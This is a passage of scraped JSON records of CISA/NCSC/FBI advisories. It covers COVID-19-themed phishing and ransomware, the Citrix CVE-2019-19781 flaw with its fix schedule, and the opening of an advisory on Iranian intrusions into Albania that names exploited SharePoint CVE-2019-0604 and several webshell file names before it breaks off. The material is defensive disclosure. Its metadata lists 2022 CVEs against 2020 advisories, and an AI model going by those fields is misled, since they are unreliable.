The document contains a malicious macro that downloads a batch file (BAT), which launches JavaScript, which\u2014in turn\u2014pulls down the TrickBot binary, executing it on the system.\n\n\n\n##### Figure 3: Email containing malicious macro targeting Italian users[[2]](<https://www.bleepingcomputer.com/news/security/trickbot-malware-targets-italy-in-fake-who-coronavirus-emails/>)\n\nIn many cases, Trojans\u2014such as Trickbot or GraceWire\u2014will download further malicious files, such as Remote Access Trojans (RATs), desktop-sharing clients, and ransomware. In order to maximize the likelihood of payment, cybercriminals will often deploy ransomware at a time when organizations are under increased pressure. Hospitals and health organizations in the United States,[[3]](<https://securityboulevard.com/2020/03/maze-ransomware-continues-to-hit-healthcare-units-amid-coronavirus-covid-19-outbreak/>) Spain,[[4]](<https://www.computing.co.uk/news/4012969/hospitals-coronavirus-ransomware>) and across Europe[[5]](<https://www.bleepingcomputer.com/news/security/covid-19-testing-center-hit-by-cyberattack/>) have all been recently affected by ransomware incidents.\n\nAs always, individuals and organizations should be on the lookout for new and evolving lures. Both CISA[[6]](<https://www.us-cert.gov/ncas/tips/ST18-271>),[[7]](<https://www.us-cert.gov/Ransomware>) and NCSC[[8]](<https://www.ncsc.gov.uk/guidance/mitigating-malware-and-ransomware-attacks>) provide guidance on mitigating malware and ransomware attacks.\n\n## Exploitation of new teleworking infrastructure\n\nMany organizations have rapidly deployed new networks, including VPNs and related IT infrastructure, to shift their entire workforce to teleworking.\n\nMalicious cyber actors are taking advantage of this mass move to telework by exploiting a variety of publicly known vulnerabilities in VPNs and other remote working tools and software. 
In several examples, CISA and NCSC have observed actors scanning for publicly known vulnerabilities in Citrix products. The Citrix vulnerability CVE-2019-19781 and its exploitation have been widely reported since early January 2020. Both CISA[[9]](<https://www.us-cert.gov/ncas/alerts/aa20-031a>) and NCSC[[10]](<https://www.ncsc.gov.uk/news/citrix-alert>) provide guidance on CVE-2019-19781 and continue to investigate multiple instances of this vulnerability's exploitation.\n\nSimilarly, known vulnerabilities affecting VPN products from Pulse Secure, Fortinet, and Palo Alto continue to be exploited. CISA provides guidance on the Pulse Secure vulnerability[[11]](<https://www.us-cert.gov/ncas/alerts/aa20-010a>) and NCSC provides guidance on the vulnerabilities in Pulse Secure, Fortinet, and Palo Alto.[[12]](<https://www.ncsc.gov.uk/news/alert-vpn-vulnerabilities>)\n\nMalicious cyber actors are also seeking to exploit the increased use of popular communications platforms\u2014such as Zoom or Microsoft Teams\u2014by sending phishing emails that include malicious files with names such as \u201czoom-us-zoom_##########.exe\u201d and \u201cmicrosoft-teams_V#mu#D_##########.exe\u201d (# representing various digits that have been reported online).[[13]](<https://blog.checkpoint.com/2020/03/30/covid-19-impact-cyber-criminals-target-zoom-domains/>) CISA and NCSC have also observed phishing websites for popular communications platforms. In addition, attackers have been able to hijack teleconferences and online classrooms that have been set up without security controls (e.g., passwords) or with unpatched versions of the communications platform software.[[14]](<https://www.fbi.gov/contact-us/field-offices/boston/news/press-releases/fbi-warns-of-teleconferencing-and-online-classroom-hijacking-during-covid-19-pandemic>)\n\nThe surge in teleworking has also led to an increase in the use of Microsoft\u2019s Remote Desktop Protocol (RDP). 
Attacks on unsecured RDP endpoints (i.e., exposed to the internet) are widely reported online,[[15]](<https://www.microsoft.com/security/blog/2020/03/05/human-operated-ransomware-attacks-a-preventable-disaster/>) and recent analysis[[16]](<https://blog.reposify.com/127-increase-in-exposed-rdps-due-to-surge-in-remote-work>) has identified a 127% increase in exposed RDP endpoints. The increase in RDP use could potentially make IT systems\u2014without the right security measures in place\u2014more vulnerable to attack.[[17]](<https://www.us-cert.gov/ncas/tips/ST18-001>)\n\n## Indicators of compromise\n\nCISA and NCSC are working with law enforcement and industry partners to disrupt or prevent these malicious cyber activities and have published a non-exhaustive list of COVID-19-related IOCs via the following links:\n\n * [AA20-099A_WHITE.csv](<https://www.us-cert.gov/sites/default/files/publications/AA20-099A_WHITE.csv>)\n * [AA20-099A_WHITE.stix](<https://www.us-cert.gov/sites/default/files/publications/AA20-099A_WHITE.stix.xml>)\n\nIn addition, there are a number of useful publicly available resources that provide details of COVID-19-related malicious cyber activity:\n\n * Recorded Future\u2019s report, [_Capitalizing on Coronavirus Panic, Threat Actors Target Victims Worldwide_](<https://go.recordedfuture.com/hubfs/reports/cta-2020-0312-2.pdf>)\n * DomainTools\u2019 [_Free COVID-19 Threat List - Domain Risk Assessments for Coronavirus Threats_](<https://www.domaintools.com/resources/blog/free-covid-19-threat-list-domain-risk-assessments-for-coronavirus-threats>)\n * GitHub list of [IOCs used in COVID-19-related cyberattack campaigns](<https://github.com/parthdmaniar/coronavirus-covid-19-SARS-CoV-2-IoCs>) gathered by GitHub user Parth D. 
Maniar\n * GitHub list of [Malware, spam, and phishing IOCs that involve the use of COVID-19 or coronavirus](<https://github.com/sophoslabs/covid-iocs>) gathered by SophosLabs\n * Reddit master thread to collect [intelligence relevant to COVID-19 malicious cyber threat actor campaigns](<https://www.reddit.com\\\\r\\\\blueteamsec\\\\comments\\\\fiy0i8\\\\master_thread_covid19corona_threat_actor_campaigns\\\\>)\n * Tweet regarding the MISP project\u2019s dedicated [#COVID2019 MISP instance](<https://twitter.com/MISPProject/status/1239864641993551873>) to share COVID-related cyber threat information\n\n### Mitigations\n\nMalicious cyber actors are continually adjusting their tactics to take advantage of new situations, and the COVID-19 pandemic is no exception. Malicious cyber actors are using the high appetite for COVID-19-related information as an opportunity to deliver malware and ransomware, and to steal user credentials. Individuals and organizations should remain vigilant. For information regarding the COVID-19 pandemic, use trusted resources, such as the Centers for Disease Control and Prevention (CDC)\u2019s [COVID-19 Situation Summary](<https://www.cdc.gov/coronavirus/2019-ncov/cases-updates/summary.html?CDC_AA_refVal=https%3A%2F%2Fwww.cdc.gov%2Fcoronavirus%2F2019-ncov%2Fsummary.html>).\n\nFollowing the CISA and NCSC advice set out below will help mitigate the risk to individuals and organizations from malicious cyber activity related to both COVID-19 and other themes:\n\n * [CISA guidance for defending against COVID-19 cyber scams](<https://www.us-cert.gov/ncas/current-activity/2020/03/06/defending-against-covid-19-cyber-scams>)\n * [CISA Insights: Risk Management for Novel Coronavirus (COVID-19)](<https://www.cisa.gov/sites/default/files/publications/20_0318_cisa_insights_coronavirus.pdf>), which provides guidance for executives regarding physical, supply chain, and cybersecurity issues related to COVID-19\n * [CISA Alert: Enterprise VPN 
Security](<https://www.us-cert.gov/ncas/alerts/aa20-073a>)\n * [CISA webpage providing a repository of the agency\u2019s COVID-19 guidance](<https://www.cisa.gov/coronavirus>)\n * [NCSC guidance to help spot, understand, and deal with suspicious messages and emails](<https://www.ncsc.gov.uk/guidance/suspicious-email-actions>)\n * [NCSC phishing guidance for organizations and cyber security professionals](<https://www.ncsc.gov.uk/guidance/phishing>)\n * [NCSC guidance on mitigating malware and ransomware attacks](<https://www.ncsc.gov.uk/guidance/mitigating-malware-and-ransomware-attacks>)\n * [NCSC guidance on home working](<https://www.ncsc.gov.uk/guidance/home-working>)\n * [NCSC guidance on end user device security](<https://www.ncsc.gov.uk/collection/end-user-device-security/eud-overview/vpns>)\n\n## Phishing guidance for individuals\n\nThe NCSC\u2019s [suspicious email guidance](<https://www.ncsc.gov.uk/guidance/suspicious-email-actions>) explains what to do if you've already clicked on a potentially malicious email, attachment, or link. It provides advice on who to contact if your account or device has been compromised and some of the mitigation steps you can take, such as changing your passwords. It also offers NCSC's top tips for spotting a phishing email:\n\n * **Authority** \u2013 Is the sender claiming to be from someone official (e.g., your bank or doctor, a lawyer, a government agency)? Criminals often pretend to be important people or organizations to trick you into doing what they want.\n * **Urgency** \u2013 Are you told you have a limited time to respond (e.g., in 24 hours or immediately)? Criminals often threaten you with fines or other negative consequences.\n * **Emotion** \u2013 Does the message make you panic, fearful, hopeful, or curious? 
Criminals often use threatening language, make false claims of support, or attempt to tease you into wanting to find out more.\n * **Scarcity** \u2013 Is the message offering something in short supply (e.g., concert tickets, money, or a cure for medical conditions)? Fear of missing out on a good deal or opportunity can make you respond quickly.\n\n## Phishing guidance for organizations and cybersecurity professionals\n\nOrganizational defenses against phishing often rely exclusively on users being able to spot phishing emails. However, organizations that widen their defenses to include more technical measures can improve resilience against phishing attacks.\n\nIn addition to educating users on defending against these attacks, organizations should consider NCSC\u2019s guidance that splits mitigations into four layers, on which to build defenses:\n\n 1. Make it difficult for attackers to reach your users.\n 2. Help users identify and report suspected phishing emails (see CISA Tips, [Using Caution with Email Attachments](<https://www.us-cert.gov/ncas/tips/ST04-010>) and [Avoiding Social Engineering and Phishing Scams](<https://www.us-cert.gov/ncas/tips/ST04-014>)).\n 3. Protect your organization from the effects of undetected phishing emails.\n 4. Respond quickly to incidents.\n\nCISA and NCSC also recommend organizations plan for a percentage of phishing attacks to be successful. Planning for these incidents will help minimize the damage caused.\n\n## Communications platforms guidance for individuals and organizations\n\nDue to COVID-19, an increasing number of individuals and organizations are turning to communications platforms\u2014such as Zoom and Microsoft Teams\u2014for online meetings. 
In turn, malicious cyber actors are hijacking online meetings that are not secured with passwords or that use unpatched software.\n\n**Tips for defending against online meeting hijacking** (Source: [FBI Warns of Teleconferencing and Online Classroom Hijacking During COVID-19 Pandemic](<https://www.fbi.gov/contact-us/field-offices/boston/news/press-releases/fbi-warns-of-teleconferencing-and-online-classroom-hijacking-during-covid-19-pandemic>), FBI press release, March 30, 2020):\n\n * Do not make meetings public. Instead, require a meeting password or use the waiting room feature and control the admittance of guests.\n * Do not share a link to a meeting on an unrestricted publicly available social media post. Provide the link directly to specific people.\n * Manage screensharing options. Change screensharing to \u201cHost Only.\u201d\n * Ensure users are using the updated version of remote access/meeting applications.\n * Ensure telework policies address requirements for physical and information security.\n\n## Disclaimers\n\n_This report draws on information derived from CISA, NCSC, and industry sources. Any findings and recommendations made have not been provided with the intention of avoiding all risks and following the recommendations will not remove all such risk. Ownership of information risks remains with the relevant system owner at all times._\n\n_CISA does not endorse any commercial product or service, including any subjects of analysis. Any reference to specific commercial products, processes, or services by service mark, trademark, manufacturer, or otherwise, does not constitute or imply their endorsement, recommendation, or favoring by CISA._\n\n### References\n\n[[1] CovidLock ransomware exploits coronavirus with malicious Android app. TechRepublic.com. March 17, 2020.](<https://www.techrepublic.com/article/covidlock-ransomware-exploits-coronavirus-with-malicious-android-app/>)\n\n[[2] TrickBot Malware Targets Italy in Fake WHO Coronavirus Emails. 
Bleeping Computer. March 6, 2020.](<https://www.bleepingcomputer.com/news/security/trickbot-malware-targets-italy-in-fake-who-coronavirus-emails/>)\n\n[[3] Maze Ransomware Continues to Hit Healthcare Units amid Coronavirus (COVID-19) Outbreak. Security Boulevard. March 19, 2020.](<https://securityboulevard.com/2020/03/maze-ransomware-continues-to-hit-healthcare-units-amid-coronavirus-covid-19-outbreak/>)\n\n[[4] Spanish hospitals targeted with coronavirus-themed phishing lures in Netwalker ransomware attacks. Computing.co.uk. March 24, 2020.](<https://www.computing.co.uk/news/4012969/hospitals-coronavirus-ransomware>)\n\n[[5] COVID-19 Testing Center Hit By Cyberattack. Bleeping Computer. March 14, 2020.](<https://www.bleepingcomputer.com/news/security/covid-19-testing-center-hit-by-cyberattack/>)\n\n[[6] CISA Tip: Protecting Against Malicious Code](<https://www.us-cert.gov/ncas/tips/ST18-271>)\n\n[[7] CISA Ransomware webpage](<https://www.us-cert.gov/Ransomware>)\n\n[[8] NCSC Guidance: Mitigating malware and ransomware attacks](<https://www.ncsc.gov.uk/guidance/mitigating-malware-and-ransomware-attacks>)\n\n[[9] CISA Alert: Detecting Citrix CVE-2019-19781](<https://www.us-cert.gov/ncas/alerts/aa20-031a>)\n\n[[10] NCSC Alert: Actors exploiting Citrix products vulnerability](<https://www.ncsc.gov.uk/news/citrix-alert>)\n\n[[11] CISA Alert: Continued Exploitation of Pulse Secure VPN Vulnerability](<https://www.us-cert.gov/ncas/alerts/aa20-010a>)\n\n[[12] NCSC Alert: Vulnerabilities exploited in VPN products used worldwide](<https://www.ncsc.gov.uk/news/alert-vpn-vulnerabilities>)\n\n[[13] COVID-19 Impact: Cyber Criminals Target Zoom Domains. Check Point blog. 
March 30, 2020.](<https://blog.checkpoint.com/2020/03/30/covid-19-impact-cyber-criminals-target-zoom-domains/>)\n\n[[14] FBI Press Release: FBI Warns of Teleconferencing and Online Classroom Hijacking During COVID-19 Pandemic](<https://www.fbi.gov/contact-us/field-offices/boston/news/press-releases/fbi-warns-of-teleconferencing-and-online-classroom-hijacking-during-covid-19-pandemic>)\n\n[[15] Microsoft Security blog: Human-operated ransomware attacks: A preventable disaster. March 5, 2020. ](<https://www.microsoft.com/security/blog/2020/03/05/human-operated-ransomware-attacks-a-preventable-disaster/>)\n\n[[16] Reposify blog: 127% increase in exposed RDPs due to surge in remote work. March 30. 2020.](<https://blog.reposify.com/127-increase-in-exposed-rdps-due-to-surge-in-remote-work>)\n\n[[17] CISA Tip: Securing Network Infrastructure Devices](<https://www.us-cert.gov/ncas/tips/ST18-001>)\n\n### Revisions\n\nApril 8, 2020: Initial Version\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-04-08T12:00:00", "type": "ics", "title": "COVID-19 Exploited by Malicious Cyber Actors", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, 
"obtainUserPrivilege": false}, "cvelist": ["CVE-2019-19781", "CVE-2022-42475", "CVE-2022-47966"], "modified": "2020-04-08T12:00:00", "id": "AA20-099A", "href": "https://www.cisa.gov/news-events/cybersecurity-advisories/aa20-099a", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-09-23T07:48:50", "description": "### Summary\n\n_Note: As of January 24, 2020, Citrix has released all expected updates in response to CVE-2019-19781._[[1]](<https://www.citrix.com/blogs/2020/01/24/citrix-releases-final-fixes-for-cve-2019-19781/>)\n\nOn January 19, 2020, Citrix released firmware updates for Citrix Application Delivery Controller (ADC) and Citrix Gateway versions 11.1 and 12.0. \nOn January 22, 2020, Citrix released security updates for vulnerable SD-WAN WANOP appliances. \nOn January 23, 2020, Citrix released firmware updates for Citrix ADC and Gateway versions 12.1 and 13.0. \nOn January 24, 2020, Citrix released firmware updates for Citrix ADC and Gateway version 10.5.\n\nA remote, unauthenticated attacker could exploit CVE-2019-19781 to perform arbitrary code execution.[[2]](<https://support.citrix.com/article/CTX267027>) This vulnerability has been detected in exploits in the wild.[[3]](<https://www.ncsc.gov.uk/news/citrix-alert>)\n\nThe Cybersecurity and Infrastructure Agency (CISA) strongly recommends that all users and administrators upgrade their vulnerable appliances as soon as possible.\n\n#### Timeline of Specific Events\n\n * December 17, 2019 \u2013 Citrix released Security Bulletin CTX267027 with mitigations steps.\n * January 8, 2020 \u2013 The CERT Coordination Center (CERT/CC) released Vulnerability Note VU#619785: Citrix Application Delivery Controller and Citrix Gateway Web Server Vulnerability,[[4]](<https://www.kb.cert.org/vuls/id/619785/>) and CISA releases a Current Activity entry.[[5]](<https://www.us-cert.gov/ncas/current-activity/2020/01/08/citrix-application-delivery-controller-and-citrix-gateway>)\n * January 
10, 2020 \u2013 The National Security Agency (NSA) released a Cybersecurity Advisory on CVE-2019-19781.[[6]](<https://media.defense.gov/2020/Jan/10/2002233132/-1/-1/0/CSA%20FOR%20CITRIXADCANDCITRIXGATEWAY_20200109.PDF>)\n * January 11, 2020 \u2013 Citrix released blog post on CVE-2019-19781 with timeline for fixes.[[7]](<https://www.citrix.com/blogs/2020/01/11/citrix-provides-update-on-citrix-adc-citrix-gateway-vulnerability/>)\n * January 13, 2020 \u2013 CISA released a Current Activity entry describing their utility that enables users and administrators to test whether their Citrix ADC and Citrix Gateway firmware is susceptible to the CVE-2019-19781 vulnerability.[[8]](<https://www.us-cert.gov/ncas/current-activity/2020/01/13/cisa-releases-test-citrix-adc-and-gateway-vulnerability>)\n * January 16, 2020 \u2013 Citrix announced that Citrix SD-WAN WANOP appliance is also vulnerable to CVE-2019-19781.\n * January 19, 2020 \u2013 Citrix released firmware updates for Citrix ADC and Citrix Gateway versions 11.1 and 12.0 and blog post on accelerated schedule for fixes.[[9]](<https://www.citrix.com/blogs/2020/01/19/vulnerability-update-first-permanent-fixes-available-timeline-accelerated/>)\n * January 22, 2020 \u2013 Citrix released security updates for Citrix SD-WAN WANOP release 10.2.6 and 11.0.3.[[10]](<https://www.citrix.com/blogs/2020/01/22/update-on-cve-2019-19781-fixes-now-available-for-citrix-sd-wan-wanop/>)\n * January 22, 2020 \u2013 Citrix and FireEye Mandiant released an indicator of compromise (IOC) scanning tool for CVE-2019-19781.[[11]](<https://www.citrix.com/blogs/2020/01/22/citrix-and-fireeye-mandiant-share-forensic-tool-for-cve-2019-19781/>)\n * January 23, 2020 \u2013 Citrix released firmware updates for Citrix ADC and Citrix Gateway versions 12.1 and 13.0.[[12]](<https://www.citrix.com/blogs/2020/01/23/fixes-now-available-for-citrix-adc-citrix-gateway-versions-12-1-and-13-0/>)\n * January 24, 2020 \u2013 Citrix released firmware updates for Citrix 
ADC and Citrix Gateway version 10.5.\n\n### Technical Details\n\n#### Impact\n\nOn December 17, 2019, Citrix reported vulnerability CVE-2019-19781. A remote, unauthenticated attacker could exploit this vulnerability to perform arbitrary code execution. This vulnerability has been detected in exploits in the wild.\n\nThe vulnerability affects the following appliances:\n\n * Citrix NetScaler ADC and NetScaler Gateway version 10.5 \u2013 all supported builds before 10.5.70.12\n * Citrix ADC and NetScaler Gateway version 11.1 \u2013 all supported builds before 11.1.63.15\n * Citrix ADC and NetScaler Gateway version 12.0 \u2013 all supported builds before 12.0.63.13\n * Citrix ADC and NetScaler Gateway version 12.1 \u2013 all supported builds before 12.1.55.18\n * Citrix ADC and Citrix Gateway version 13.0 \u2013 all supported builds before 13.0.47.24\n * Citrix SD-WAN WANOP appliance models 4000-WO, 4100-WO, 5000-WO, and 5100-WO \u2013 all supported software release builds before 10.2.6b and 11.0.3b. (Citrix SD-WAN WANOP is vulnerable because it packages Citrix ADC as a load balancer).\n\n#### Detection Measures\n\nCitrix and FireEye Mandiant released an [IOC scanning tool for CVE-2019-19781](<https://github.com/citrix/ioc-scanner-CVE-2019-19781/>) on January 22, 2020. 
The tool aids customers with detecting potential IOCs based on known attacks and exploits.[[13]](<https://www.citrix.com/blogs/2020/01/22/citrix-and-fireeye-mandiant-share-forensic-tool-for-cve-2019-19781/>)\n\nSee the National Security Agency\u2019s Cybersecurity Advisory on CVE-2019-19781 for other detection measures.[[14]](<https://media.defense.gov/2020/Jan/10/2002233132/-1/-1/0/CSA%20FOR%20CITRIXADCANDCITRIXGATEWAY_20200109.PDF>)\n\nCISA released a utility that enables users and administrators to detect whether their Citrix ADC and Citrix Gateway firmware is susceptible to CVE-2019-19781.[[15] ](<https://www.us-cert.gov/ncas/current-activity/2020/01/13/cisa-releases-test-citrix-adc-and-gateway-vulnerability>)CISA encourages administrators to visit CISA\u2019s [GitHub page](<https://github.com/cisagov/check-cve-2019-19781>) to download and run the tool.\n\n### Mitigations\n\nCISA strongly recommends users and administrators update Citrix ADC, Citrix Gateway, and Citrix SD-WAN WANOP as soon as possible.\n\nThe fixed builds can be downloaded from Citrix Downloads pages for [Citrix ADC](<https://www.citrix.com/downloads/citrix-adc/>), [Citrix Gateway](<https://www.citrix.com/downloads/citrix-gateway/>), and [Citrix SD-WAN](<https://www.citrix.com/downloads/citrix-sd-wan/>).\n\nUntil the appropriate update is implemented, users and administrators should apply Citrix\u2019s interim mitigation steps for CVE-2019-19781.[[16]](<https://support.citrix.com/article/CTX267679>) Verify the successful application of the above mitigations by using the tool in [CTX269180 \u2013 CVE-2019-19781 \u2013 Verification ToolTest](<https://support.citrix.com/article/CTX269180>).** Note:** these mitigation steps apply to Citrix ADC and SD-WAN WANOP deployments.[[17]](<https://support.citrix.com/article/CTX267027>)\n\nRefer to table 1 for Citrix\u2019s fix schedule.[[18]](<https://support.citrix.com/article/CTX267027>)\n\n**Table 1. 
Fix schedule for Citrix appliances vulnerable to CVE-2019-19781**\n\n**Vulnerable Appliance** | **Firmware Update** | **Release Date** \n---|---|--- \nCitrix ADC and Citrix Gateway version 10.5 | Refresh Build 10.5.70.12 | January 24, 2020 \nCitrix ADC and Citrix Gateway version 11.1 | Refresh Build 11.1.63.15 | January 19, 2020 \nCitrix ADC and Citrix Gateway version 12.0 | Refresh Build 12.0.63.13 | January 19, 2020 \nCitrix ADC and Citrix Gateway version 12.1 | Refresh Build 12.1.55.18 | January 23, 2020 \nCitrix ADC and Citrix Gateway version 13.0 | Refresh Build 13.0.47.24 | January 23, 2020 \nCitrix SD-WAN WANOP Release 10.2.6 | Build 10.2.6b | January 22, 2020 \nCitrix SD-WAN WANOP Release 11.0.3 | Build 11.0.3b | January 22, 2020 \n \nAdministrators should review NSA\u2019s [Citrix Advisory](<https://media.defense.gov/2020/Jan/10/2002233132/-1/-1/0/CSA%20FOR%20CITRIXADCANDCITRIXGATEWAY_20200109.PDF>) for other mitigations, such as applying the following defense-in-depth strategy:\n\n\u201cConsider deploying a VPN capability using standardized protocols, preferably ones listed on the National Information Assurance Partnership (NIAP) Product Compliant List (PCL), in front of publicly accessible Citrix ADC and Citrix Gateway appliances to require user authentication for the VPN before being able to reach these appliances. 
Use of a proprietary SSLVPN/TLSVPN is discouraged.\u201d\n\n### References\n\n[[1] Citrix blog: Citrix releases final fixes for CVE-2019-19781](<https://www.citrix.com/blogs/2020/01/24/citrix-releases-final-fixes-for-cve-2019-19781/>)\n\n[[2] Citrix Security Bulletin CTX267027, Vulnerability in Citrix Application Delivery Controller and Citrix Gateway](<https://support.citrix.com/article/CTX267027>)\n\n[[3] United Kingdom National Cyber Security Centre (NCSC) Alert: Actors exploiting Citrix products vulnerability](<https://www.ncsc.gov.uk/news/citrix-alert>)\n\n[[4] CERT/CC Vulnerability Note VU#619785](<https://www.kb.cert.org/vuls/id/619785/>)\n\n[[5] CISA Current Activity: Citrix Application Delivery Controller and Citrix Gateway Vulnerability](<https://www.us-cert.gov/ncas/current-activity/2020/01/08/citrix-application-delivery-controller-and-citrix-gateway>)\n\n[[6] NSA Cybersecurity Advisory: Mitigate CVE-2019-19781: Critical Vulnerability in Citrix Application Delivery Controller (ADC) and Citrix Gateway](<https://media.defense.gov/2020/Jan/10/2002233132/-1/-1/0/CSA%20FOR%20CITRIXADCANDCITRIXGATEWAY_20200109.PDF>)\n\n[[7] Citrix blog: Citrix provides update on Citrix ADC, Citrix Gateway vulnerability](<https://www.citrix.com/blogs/2020/01/11/citrix-provides-update-on-citrix-adc-citrix-gateway-vulnerability/>)\n\n[[8] CISA Current Activity: CISA Releases Test for Citrix ADC and Gateway Vulnerability GitHub: CISAgov \u2013 check-cve-2019-19781](<https://www.us-cert.gov/ncas/current-activity/2020/01/13/cisa-releases-test-citrix-adc-and-gateway-vulnerability>)\n\n[[9] Citrix Blog: Vulnerability Update: First permanent fixes available, timeline accelerated](<https://www.citrix.com/blogs/2020/01/19/vulnerability-update-first-permanent-fixes-available-timeline-accelerated/>)\n\n[[10] Citrix Blog: Update on CVE-2019-19781: Fixes now available for Citrix SD-WAN 
WANOP](<https://www.citrix.com/blogs/2020/01/22/update-on-cve-2019-19781-fixes-now-available-for-citrix-sd-wan-wanop/>)\n\n[[11] Citrix Blog: Citrix and FireEye Mandiant share forensic tool for CVE-2019-19781](<https://www.citrix.com/blogs/2020/01/22/citrix-and-fireeye-mandiant-share-forensic-tool-for-cve-2019-19781/>)\n\n[[12] Citrix Blog: Fixes now available for Citrix ADC, Citrix Gateway versions 12.1 and 13.0](<https://www.citrix.com/blogs/2020/01/23/fixes-now-available-for-citrix-adc-citrix-gateway-versions-12-1-and-13-0/>)\n\n[[13] Citrix Blog: Citrix and FireEye Mandiant share forensic tool for CVE-2019-19781](<https://www.citrix.com/blogs/2020/01/22/citrix-and-fireeye-mandiant-share-forensic-tool-for-cve-2019-19781/>)\n\n[[14] NSA Cybersecurity Advisory: Mitigate CVE-2019-19781: Critical Vulnerability in Citrix Application Delivery Controller (ADC) and Citrix Gateway ](<https://media.defense.gov/2020/Jan/10/2002233132/-1/-1/0/CSA%20FOR%20CITRIXADCANDCITRIXGATEWAY_20200109.PDF>)\n\n[[15] CISA Current Activity: CISA Releases Test for Citrix ADC and Gateway Vulnerability GitHub: CISAgov \u2013 check-cve-2019-19781 ](<https://www.us-cert.gov/ncas/current-activity/2020/01/13/cisa-releases-test-citrix-adc-and-gateway-vulnerability>)\n\n[[16] Citrix Security Bulletin CTX267679, Mitigation Steps for CVE-2019-19781 ](<https://support.citrix.com/article/CTX267679>)\n\n[[17] Citrix Security Bulletin CTX267027, Vulnerability in Citrix Application Delivery Controller and Citrix Gateway ](<https://support.citrix.com/article/CTX267027>)\n\n[[18] Citrix Security Bulletin CTX267027, Vulnerability in Citrix Application Delivery Controller and Citrix Gateway ](<https://support.citrix.com/article/CTX267027>)\n\n### Revisions\n\nJanuary 20, 2020: Initial Version|January 23, 2020: Updated with information about Citrix releasing fixes for SD-WAN WANOP appliances and an IOC scanning tool|January 24, 2020: Updated with information about Citrix releasing fixes for Citrix ADC and 
Gateway versions 10.5, 12.1, and 13.0|January 27, 2020: Updated vulnerable versions of ADC and Gateway version 10.5\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-05-21T12:00:00", "type": "ics", "title": "Critical Vulnerability in Citrix Application Delivery Controller, Gateway, and SD-WAN WANOP", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-19781", "CVE-2022-42475", "CVE-2022-47966"], "modified": "2020-05-21T12:00:00", "id": "AA20-020A", "href": "https://www.cisa.gov/news-events/cybersecurity-advisories/aa20-020a", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-09-23T19:54:38", "description": "### Summary\n\nThe Federal Bureau of Investigation (FBI) and the Cybersecurity and Infrastructure Security Agency (CISA) are releasing this joint Cybersecurity Advisory to provide information on recent cyber operations against the Government of Albania in July and September. This advisory provides a timeline of activity observed, from initial access to execution of encryption and wiper attacks. 
Additional information concerning files used by the actors during their exploitation of and cyber attack against the victim organization is provided in Appendices A and B.\n\nIn July 2022, Iranian state cyber actors\u2014identifying as \u201cHomeLand Justice\u201d\u2014launched a destructive cyber attack against the Government of Albania which rendered websites and services unavailable. An FBI investigation indicates Iranian state cyber actors acquired initial access to the victim\u2019s network approximately 14 months before launching the destructive cyber attack, which included a ransomware-style file encryptor and disk wiping malware. The actors maintained continuous network access for approximately a year, periodically accessing and exfiltrating e-mail content.\n\nBetween May and June 2022, Iranian state cyber actors conducted lateral movements, network reconnaissance, and credential harvesting from Albanian government networks. In July 2022, the actors launched ransomware on the networks, leaving an anti-Mujahideen E-Khalq (MEK) message on desktops. When network defenders identified and began to respond to the ransomware activity, the cyber actors deployed a version of ZeroCleare destructive malware.\n\nIn June 2022, HomeLand Justice created a website and multiple social media profiles posting anti-MEK messages. On July 18, 2022, HomeLand Justice claimed credit for the cyber attack on Albanian government infrastructure. On July 23, 2022, HomeLand Justice posted videos of the cyber attack on their website. 
From late July to mid-August 2022, social media accounts associated with HomeLand Justice demonstrated a repeated pattern of advertising Albanian Government information for release, posting a poll asking respondents to select the government information to be released by HomeLand Justice, and then releasing that information\u2014either in a .zip file or a video of a screen recording with the documents shown.\n\nIn September 2022, Iranian cyber actors launched another wave of cyber attacks against the Government of Albania, using similar TTPs and malware as the cyber attacks in July. These were likely done in retaliation for public attribution of the cyber attacks in July and severed diplomatic ties between Albania and Iran.\n\nDownload the PDF version of this report: pdf, 1221 kb\n\nDownload the STIX file: pdf, 44 KB\n\n### Technical Details\n\n#### **Initial access**\n\nTimeframe: Approximately 14 months before encryption and wiper attacks.\n\nDetails: Initial access was obtained via exploitation of an Internet-facing Microsoft SharePoint, exploiting CVE-2019-0604.\n\n#### Persistence and Lateral movement\n\nTimeframe: Approximately several days to two months after initial compromise.\n\nDetails: After obtaining access to the victim environment, the actors used several .aspx webshells, `pickers.aspx`, `error4.aspx`, and `ClientBin.aspx`, to maintain persistence. During this timeframe, the actors also used 